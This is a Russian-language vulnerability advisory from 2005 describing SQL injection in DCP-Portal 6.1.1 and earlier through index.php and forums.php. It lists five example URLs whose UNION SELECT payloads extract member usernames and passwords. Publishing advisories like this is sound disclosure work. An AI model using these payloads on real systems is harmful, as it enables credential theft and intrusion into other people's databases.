Security Lab

SQL-инъекция в DCP-Portal

Дата публикации:17.02.2005
Всего просмотров:1357
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: DCP-Portal 6.1.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL запросы в целевой базе данных.

Уязвимость существует в сценариях 'index.php' и 'forums.php' из-за некорректной обработки полученных данных. При значении magic_quotes_gpc = off в конфигурационном файле php.ini, удаленный пользователь может создать специально сформированный HTTP запрос и произвести SQL-инъекцию. Примеры:

http://[target]/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password
FROM dcp5_members WHERE username=%27[username]

http://[target]/index.php?page=documents&doc=-99%27 UNION SELECT
null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]

http://[target]/index.php?page=mdeta ils&uid=-99%27 UNION SELECT null,null,null,username,null,
null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members
WHERE username=%27[username]

http://[target]/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null,
username,null,null,nu ll FROM dcp5_members WHERE username=%27[username]

http://[target]/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM
dcp5_members WHERE username=%27[username]

URL производителя: http://www.dcp-portal.com

Решение: Способов устранения уязвимости не существует в настоящее время.